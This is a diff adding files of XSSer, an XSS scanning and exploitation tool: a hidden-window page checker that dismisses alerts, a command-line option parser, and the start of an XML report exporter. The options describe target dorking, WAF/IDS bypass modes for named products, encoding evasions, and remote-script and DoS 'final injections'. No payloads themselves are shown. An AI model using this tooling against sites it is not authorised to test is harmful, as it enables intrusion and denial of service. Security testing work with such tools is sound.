+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import gtk
+import sys
+import gobject
+import subprocess
+from threading import Thread
+try:
+    from gtkmozembed import MozEmbed
+except:
+    MozEmbed = None
+    import webbrowser
+
+
+class CheckerThread(Thread):
+    def __init__(self, parent, url):
+        Thread.__init__(self)
+        self.daemon = True
+        self._armed = True
+        self._url = url
+        self._parent = parent
+    def shutdown(self):
+        if self.result:
+            self._armed = False
+            self.result.terminate()
+    def run(self):
+        self.result = subprocess.Popen([sys.executable, __file__, self._url],
+                                 stderr=subprocess.PIPE)
+        self.result.wait()
+        if self._armed:
+            self._parent.on_net_stop()
+        self.result = None
+
+class MozChecker(object):
+    """
+    Serial URL checker: opens one URL at a time (through a CheckerThread
+    subprocess when gtkmozembed is available, otherwise through the stdlib
+    webbrowser module) and queues the rest in FIFO order.
+    """
+    def __init__(self, parent):
+        self._busy = False          # False when idle; holds the running CheckerThread otherwise
+        self._urlqueue = []         # FIFO of URLs waiting to be opened
+        self._parent = parent
+        self._armed = True          # cleared by shutdown() to stop draining the queue
+        if MozEmbed:
+            pass
+        else:
+            # no gtkmozembed: fall back to opening URLs in the system browser
+            self.open = self.open_webbrowser
+
+    def remaining(self):
+        # number of URLs still waiting in the queue
+        return len(self._urlqueue)
+
+    def init_mozembed(self):
+        # NOTE(review): self.add() is not defined on MozChecker -- this method
+        # looks written for a gtk container subclass; confirm before calling
+        self.moz = MozEmbed()
+        self.moz.connect('net-stop', self.on_net_stop)
+        self.moz.connect('net-state', self.on_net_state)
+        self.moz.connect('new-window', self.on_new_window)
+        self.add(self.moz)
+        self.moz.show()
+
+    def on_new_window(self, widget, retval, chromemask):
+        # debug trace for popup attempts; returning False declines the window
+        print("new window")
+        print(widget, retval, chromemask)
+        return False
+
+    def open_webbrowser(self, url):
+        # fallback opener: new browser tab (2), without raising the window
+        webbrowser.open(url, 2, False)
+
+    def open_job(self, url):
+        # start checking one URL in a background thread; _busy doubles as the
+        # "in progress" flag (the thread object is truthy)
+        if self._parent:
+            self._parent.start_token_check(url)
+        self._busy = CheckerThread(self, url)
+        self._busy.start()
+
+    def shutdown(self):
+        # stop the current check (if any) and prevent further queue draining
+        if self._busy:
+            self._armed = False
+            self._busy.shutdown()
+            self._busy.join()
+
+    def open(self, url):
+        # public entry point: run immediately when idle, else enqueue
+        if not self._busy:
+            self.open_job(url)
+        else:
+            self._urlqueue.append(url)
+
+    def on_js_status(self, widget):
+        widget.get_js_status()
+
+    def on_net_state(self, widget, flags, status):
+        # debug trace of MozEmbed network state changes
+        print("net_state", widget, flags, status)
+
+    def on_net_stop(self, widget=None):
+        # called from the checker thread: hop onto the GTK main loop before
+        # touching the queue (timeout 0 = run on next iteration)
+        gtk.gdk.threads_enter()
+        gobject.timeout_add(0, self.process_next)
+        gtk.gdk.threads_leave()
+
+    def process_next(self):
+        # drain the next queued URL, or mark the checker idle
+        if self._urlqueue and self._armed:
+            next_url = self._urlqueue.pop(0)
+            self.open_job(next_url)
+        else:
+            self._busy = False
+
+if __name__ == '__main__':
+    # Child-process mode (spawned by CheckerThread): load sys.argv[1] in a
+    # hidden MozEmbed window, auto-dismiss alert dialogs, and bail out after
+    # 30 seconds no matter what.
+    win = gtk.Window()
+    def finished(widget):
+        # page finished loading: leave the GTK main loop
+        gtk.main_quit()
+
+    def alertkill():
+        # poll every 100ms for JS alert/warning dialogs and destroy them
+        for a in gtk.window_list_toplevels():
+            if a.get_title() and (a.get_title() == 'Alert' or 'says' in a.get_title() or 'Warning' in a.get_title()):
+                print(a.get_children())
+                a.hide()
+                a.destroy()
+                gtk.main_quit()
+        gobject.timeout_add(100, alertkill)
+
+    def bailout():
+        # hard timeout: abandon the page load entirely
+        gtk.main_quit()
+        sys.exit()
+
+    def unmap(widget):
+        # keep the browser window invisible even if GTK tries to map it
+        widget.hide()
+
+    def new_window(widget, retval, mask):
+        print("new window!!")
+
+    gobject.timeout_add(30000, bailout)
+    gobject.timeout_add(100, alertkill)
+
+    win = gtk.Window()
+    win.set_property('skip-taskbar-hint', True)
+    win.set_property('skip-pager-hint', True)
+    win.set_keep_below(True)
+    win.connect('map', unmap)
+
+    moz = MozEmbed()
+    moz.load_url(sys.argv[1])
+
+    moz.connect('net-stop', finished)
+    moz.connect('new-window', new_window)
+
+    win.set_title(sys.argv[1])
+
+    win.add(moz)
+    win.show_all()
+    gtk.main()

+ 207 - 0
xsser/core/options.py

@@ -0,0 +1,207 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, https://xsser.03c8.net
+
+Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import optparse
+import core.fuzzing.vectors
+import core.fuzzing.DCP
+import core.fuzzing.DOM
+import core.fuzzing.HTTPsr
+
+class XSSerOptions(optparse.OptionParser):
+    """
+    Command-line option parser for XSSer (optparse-based, Python 2).
+
+    Construction registers all option groups; get_options() parses argv and
+    prints the ASCII banner (returning False) when no target/action is given.
+    """
+    def __init__(self, *args):
+        optparse.OptionParser.__init__(self, 
+                           description='Cross Site "Scripter" is an automatic -framework- to detect, exploit and\nreport XSS vulnerabilities in web-based applications.',
+                           prog='XSSer.py',
+			   version='\nXSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2018 - (GPLv3.0) -> by psy\n',
+                           usage= '\n\nxsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]\n[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}')
+        self.set_defaults(verbose=False, threads=5, retries=1, delay=0, timeout=30,
+                          silent=False)
+        self.disable_interspersed_args()
+        # vector counts shown in the banner: one total per fuzzing module
+        self.vectors_fuzz = len(core.fuzzing.vectors.vectors)
+        self.vectors_dcp = len(core.fuzzing.DCP.DCPvectors)
+        self.vectors_dom = len(core.fuzzing.DOM.DOMvectors)
+        self.vectors_httpsr = len(core.fuzzing.HTTPsr.HTTPrs_vectors)
+        self.total_vectors = str(self.vectors_fuzz+self.vectors_dcp+self.vectors_dom+self.vectors_httpsr)
+
+        # top-level (ungrouped) options
+        self.add_option("-s", "--statistics",  action="store_true", dest="statistics", help="show advanced statistics output results")
+        self.add_option("-v", "--verbose", action="store_true", dest="verbose", help="active verbose mode output results")
+        self.add_option("--gtk", action="store_true", dest="xsser_gtk", help="launch XSSer GTK Interface")
+        #self.add_option("--swarm", action="store_true", dest="xsser_web", help="launch XSSer Swarm daemon(s) + Web-Shell")
+        self.add_option("--wizard", action="store_true", dest="wizard", help="start Wizard Helper!")
+
+        group1 = optparse.OptionGroup(self, "*Special Features*",
+        "You can set Vector(s) and Bypasser(s) to build complex scripts for XSS code embedded. XST allows you to discover if target is vulnerable to 'Cross Site Tracing' [CAPEC-107]:")
+        group1.add_option("--imx", action="store", dest="imx", help="IMX - Create an image with XSS (--imx image.png)")
+        group1.add_option("--fla", action="store", dest="flash", help="FLA - Create a flash movie with XSS (--fla movie.swf)")
+        group1.add_option("--xst", action="store", dest="xst", help="XST - Cross Site Tracing (--xst http(s)://host.com)")
+        self.add_option_group(group1)
+
+        group2 = optparse.OptionGroup(self, "*Select Target(s)*",
+        "At least one of these options must to be specified to set the source to get target(s) urls from:")
+        group2.add_option("--all", action="store", dest="target", help="Automatically audit an entire target")
+        group2.add_option("-u", "--url", action="store", dest="url", help="Enter target to audit") 
+        group2.add_option("-i", action="store", dest="readfile", help="Read target(s) urls from file")
+        group2.add_option("-d", action="store", dest="dork", help="Search target(s) using a query (ex: 'news.php?id=')")
+        group2.add_option("-l", action="store_true", dest="dork_file", help="Search from a list of 'dorks'")
+        group2.add_option("--De", action="store", dest="dork_engine", help="Use this search engine (default: yahoo)")
+        group2.add_option("--Da", action="store_true", dest="dork_mass", help="Search massively using all search engines")
+        self.add_option_group(group2)
+
+        group3 = optparse.OptionGroup(self, "*Select type of HTTP/HTTPS Connection(s)*",
+        "These options can be used to specify which parameter(s) we want to use as payload(s). Set 'XSS' as keyword on the place(s) that you want to inject:")
+        group3.add_option("-g", action="store", dest="getdata", help="Send payload using GET (ex: '/menu.php?id=3&q=XSS')")
+        group3.add_option("-p", action="store", dest="postdata", help="Send payload using POST (ex: 'foo=1&bar=XSS')")
+        group3.add_option("-c", action="store", dest="crawling", help="Number of urls to crawl on target(s): 1-99999")
+        group3.add_option("--Cw", action="store", dest="crawler_width", help="Deeping level of crawler: 1-5 (default 3)")
+        group3.add_option("--Cl", action="store_true", dest="crawler_local", help="Crawl only local target(s) urls (default TRUE)") 
+        self.add_option_group(group3)
+
+        group4 = optparse.OptionGroup(self, "*Configure Request(s)*",
+        "These options can be used to specify how to connect to the target(s) payload(s). You can choose multiple:") 
+        group4.add_option("--cookie", action="store", dest="cookie", help="Change your HTTP Cookie header")
+        group4.add_option("--drop-cookie", action="store_true", dest="dropcookie", help="Ignore Set-Cookie header from response")
+        group4.add_option("--user-agent", action="store", dest="agent", help="Change your HTTP User-Agent header (default SPOOFED)")
+        group4.add_option("--referer", action="store", dest="referer", help="Use another HTTP Referer header (default NONE)")
+        group4.add_option("--xforw", action="store_true", dest="xforw", help="Set your HTTP X-Forwarded-For with random IP values")
+        group4.add_option("--xclient", action="store_true", dest="xclient", help="Set your HTTP X-Client-IP with random IP values")
+        group4.add_option("--headers", action="store", dest="headers", help="Extra HTTP headers newline separated")
+        group4.add_option("--auth-type", action="store", dest="atype", help="HTTP Authentication type (Basic, Digest, GSS or NTLM)") 
+        group4.add_option("--auth-cred", action="store", dest="acred", help="HTTP Authentication credentials (name:password)")
+        #group4.add_option("--auth-cert", action="store", dest="acert", help="HTTP Authentication certificate (key_file,cert_file)") 
+        group4.add_option("--proxy", action="store", dest="proxy", help="Use proxy server (tor: http://localhost:8118)")
+        group4.add_option("--ignore-proxy", action="store_true", dest="ignoreproxy", help="Ignore system default HTTP proxy")
+        group4.add_option("--timeout", action="store", dest="timeout", type="int", help="Select your timeout (default 30)")
+        group4.add_option("--retries", action="store", dest="retries", type="int", help="Retries when the connection timeouts (default 1)")
+        group4.add_option("--threads", action="store", dest="threads", type="int", help="Maximum number of concurrent HTTP requests (default 5)") 
+        group4.add_option("--delay", action="store", dest="delay", type="int", help="Delay in seconds between each HTTP request (default 0)")
+        group4.add_option("--tcp-nodelay", action="store_true", dest="tcp_nodelay", help="Use the TCP_NODELAY option")
+        group4.add_option("--follow-redirects", action="store_true", dest="followred", help="Follow server redirection responses (302)")
+        group4.add_option("--follow-limit", action="store", dest="fli", type="int", help="Set limit for redirection requests (default 50)")
+        self.add_option_group(group4)
+
+        group5 = optparse.OptionGroup(self, "*Checker Systems*",
+        "These options are useful to know if your target is using filters against XSS attacks:")
+        group5.add_option("--hash", action="store_true", dest="hash", help="send a hash to check if target is repeating content")
+        group5.add_option("--heuristic", action="store_true", dest="heuristic", help="discover parameters filtered by using heuristics")
+        group5.add_option("--discode", action="store", dest="discode", help="set code on reply to discard an injection")
+        group5.add_option("--checkaturl", action="store", dest="alt", help="check reply using: alternative url -> Blind XSS")
+        group5.add_option("--checkmethod", action="store", dest="altm", help="check reply using: GET or POST (default: GET)")
+        group5.add_option("--checkatdata", action="store", dest="ald", help="check reply using: alternative payload") 
+        group5.add_option("--reverse-check", action="store_true", dest="reversecheck", help="establish a reverse connection from target to XSSer to certify that is 100% vulnerable (recommended!)")
+        self.add_option_group(group5)
+
+        group6 = optparse.OptionGroup(self, "*Select Vector(s)*",
+        "These options can be used to specify injection(s) code. Important if you don't want to inject a common XSS vector used by default. Choose only one option:")
+        group6.add_option("--payload", action="store", dest="script", help="OWN  - Inject your own code")
+        group6.add_option("--auto", action="store_true", dest="fuzz", help="AUTO - Inject a list of vectors provided by XSSer")
+        self.add_option_group(group6)
+
+        group13 = optparse.OptionGroup(self, "*Anti-antiXSS Firewall rules*",
+        "These options can be used to try to bypass specific WAF/IDS products. Choose only if required:")
+        group13.add_option("--Phpids0.6.5", action="store_true", dest="phpids065", help="PHPIDS (0.6.5) [ALL]")
+        group13.add_option("--Phpids0.7", action="store_true", dest="phpids070", help="PHPIDS (0.7) [ALL]")
+        group13.add_option("--Imperva", action="store_true", dest="imperva", help="Imperva Incapsula [ALL]")
+        group13.add_option("--Webknight", action="store_true", dest="webknight", help="WebKnight (4.1) [Chrome]")
+        group13.add_option("--F5bigip", action="store_true", dest="f5bigip", help="F5 Big IP [Chrome + FF + Opera]")
+        group13.add_option("--Barracuda", action="store_true", dest="barracuda", help="Barracuda WAF [ALL]")
+        group13.add_option("--Modsec", action="store_true", dest="modsec", help="Mod-Security [ALL]")
+        group13.add_option("--Quickdefense", action="store_true", dest="quickdefense", help="QuickDefense [Chrome]")
+        self.add_option_group(group13)
+       
+        group7 = optparse.OptionGroup(self, "*Select Bypasser(s)*",
+        "These options can be used to encode vector(s) and try to bypass possible anti-XSS filters. They can be combined with other techniques:")
+        group7.add_option("--Str", action="store_true", dest="Str", help="Use method String.FromCharCode()")
+        group7.add_option("--Une", action="store_true", dest="Une", help="Use Unescape() function")
+        group7.add_option("--Mix", action="store_true", dest="Mix", help="Mix String.FromCharCode() and Unescape()")
+        group7.add_option("--Dec", action="store_true", dest="Dec", help="Use Decimal encoding")
+        group7.add_option("--Hex", action="store_true", dest="Hex", help="Use Hexadecimal encoding")
+        group7.add_option("--Hes", action="store_true", dest="Hes", help="Use Hexadecimal encoding with semicolons")
+        group7.add_option("--Dwo", action="store_true", dest="Dwo", help="Encode IP addresses with DWORD")
+        group7.add_option("--Doo", action="store_true", dest="Doo", help="Encode IP addresses with Octal")
+        group7.add_option("--Cem", action="store", dest="Cem", help="Set different 'Character Encoding Mutations' (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')")
+        self.add_option_group(group7)
+
+        group8 = optparse.OptionGroup(self, "*Special Technique(s)*",
+        "These options can be used to inject code using different XSS techniques. You can choose multiple:")
+        group8.add_option("--Coo", action="store_true", dest="coo", help="COO - Cross Site Scripting Cookie injection")
+        group8.add_option("--Xsa", action="store_true", dest="xsa", help="XSA - Cross Site Agent Scripting")
+        group8.add_option("--Xsr", action="store_true", dest="xsr", help="XSR - Cross Site Referer Scripting")
+        group8.add_option("--Dcp", action="store_true", dest="dcp", help="DCP - Data Control Protocol injections")
+        group8.add_option("--Dom", action="store_true", dest="dom", help="DOM - Document Object Model injections")
+        group8.add_option("--Ind", action="store_true", dest="inducedcode", help="IND - HTTP Response Splitting Induced code")
+        group8.add_option("--Anchor", action="store_true", dest="anchor", help="ANC - Use Anchor Stealth payloader (DOM shadows!)")
+        self.add_option_group(group8)
+
+        group9 = optparse.OptionGroup(self, "*Select Final injection(s)*",
+        "These options can be used to specify the final code to inject on vulnerable target(s). Important if you want to exploit 'on-the-wild' the vulnerabilities found. Choose only one option:")
+        group9.add_option("--Fp", action="store", dest="finalpayload", help="OWN    - Exploit your own code")
+        group9.add_option("--Fr", action="store", dest="finalremote", help="REMOTE - Exploit a script -remotely-")
+        group9.add_option("--Doss", action="store_true", dest="doss", help="DOSs   - XSS (server) Denial of Service")
+        group9.add_option("--Dos", action="store_true", dest="dos", help="DOS    - XSS (client) Denial of Service")
+        group9.add_option("--B64", action="store_true", dest="b64", help="B64    - Base64 code encoding in META tag (rfc2397)")
+        self.add_option_group(group9)
+        
+        group10 = optparse.OptionGroup(self, "*Special Final injection(s)*",
+        "These options can be used to execute some 'special' injection(s) on vulnerable target(s). You can select multiple and combine them with your final code (except with DCP code):")
+        group10.add_option("--Onm", action="store_true", dest="onm", help="ONM - Use onMouseMove() event")
+        group10.add_option("--Ifr", action="store_true", dest="ifr", help="IFR - Use <iframe> source tag")
+        self.add_option_group(group10)
+
+        group11 = optparse.OptionGroup(self, "*Reporting*")
+        group11.add_option("--save", action="store_true", dest="fileoutput", help="export to file (XSSreport.raw)")
+        group11.add_option("--xml", action="store", dest="filexml", help="export to XML (--xml file.xml)")
+        self.add_option_group(group11)
+
+        group12 = optparse.OptionGroup(self, "*Miscellaneous*")
+        group12.add_option("--silent", action="store_true", dest="silent", help="inhibit console output results")
+        group12.add_option("--no-head", action="store_true", dest="nohead", help="NOT send a HEAD request before start a test")
+        group12.add_option("--alive", action="store", dest="isalive", type="int", help="set limit of errors before check if target is alive")
+        group12.add_option("--update", action="store_true", dest="update", help="check for latest stable version")
+        self.add_option_group(group12)
+
+    def get_options(self, user_args=None):
+        """Parse user_args (or sys.argv). When no target/action option was
+        given, print the ASCII-art banner with the vector totals and return
+        False; otherwise return the optparse options object.
+        (Python 2 print statements.)
+        """
+        (options, args) = self.parse_args(user_args)
+        if (not options.url and not options.readfile and not options.dork and not options.dork_file and not options.imx and not options.flash and not options.update and not options.xsser_gtk and not options.wizard and not options.xst and not options.target):
+            print "\n", '='*75
+            print self.version
+            print "-----------", "\n"
+            print self.description, "\n"
+            print '='*75
+            print ""
+            print "                                       \\ \\                           %"
+            print "Project site:","                          \\ \\     LulZzzz!           %  "
+            print "http://xsser.03c8.net                 %% \\_\\                      %   "
+            print "                                      \/ ( \033[1;31m@\033[1;m.\033[1;31m@\033[1;m)         Bbzzzzz!      %  "
+            print "                                       \== < ==                  %      "
+            print "Forum:                                    / \_      ==       %          "
+            print "irc.freenode.net -> #xsser              (')   \   *=====%             "
+            print "                                       /  /       ========              "
+            print ""
+            print '='*75
+            print "Total vectors:", self.total_vectors + " = XSS: " + str(self.vectors_fuzz) + " + DCP: " + str(self.vectors_dcp) + " + DOM: " + str(self.vectors_dom) + " + HTTPsr: " + str(self.vectors_httpsr)
+            print '='*75
+            print "\n-> For HELP use: -h or --help"
+            print "\n-> For GTK interface use: --gtk\n"
+            print '='*55, "\n"
+            return False
+        return options

+ 20 - 0
xsser/core/post/__init__.py

@@ -0,0 +1,20 @@
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""

+ 173 - 0
xsser/core/post/xml_exporter.py

@@ -0,0 +1,173 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import xml.etree.ElementTree as ET
+import datetime
+
+class xml_reporting(object):
+    """
+    Print results from an attack in an XML fashion
+    """
+    def __init__(self, xsser):
+        """Keep a reference to the running XSSer instance and zero the
+        per-technique hit counters (XSR, XSA, cookie, DCP, DOM, induced)."""
+        # initialize main XSSer
+        self.instance = xsser
+
+	# some counters
+        self.xsr_found = 0
+        self.xsa_found = 0
+        self.coo_found = 0
+        self.dcp_found = 0
+        self.dom_found = 0
+        self.ind_found = 0
+
+    def print_xml_results(self, filename):
+        root = ET.Element("report")
+        hdr = ET.SubElement(root, "header")
+        title = ET.SubElement(hdr, "title")
+        title.text = "XSSer Security Report: " + str(datetime.datetime.now())
+        abstract = ET.SubElement(root, "abstract")
+        total_injections = len(self.instance.hash_found) + len(self.instance.hash_notfound)
+
+        if len(self.instance.hash_found) + len(self.instance.hash_notfound) == 0:
+            pass 
+        injections = ET.SubElement(abstract, "injections")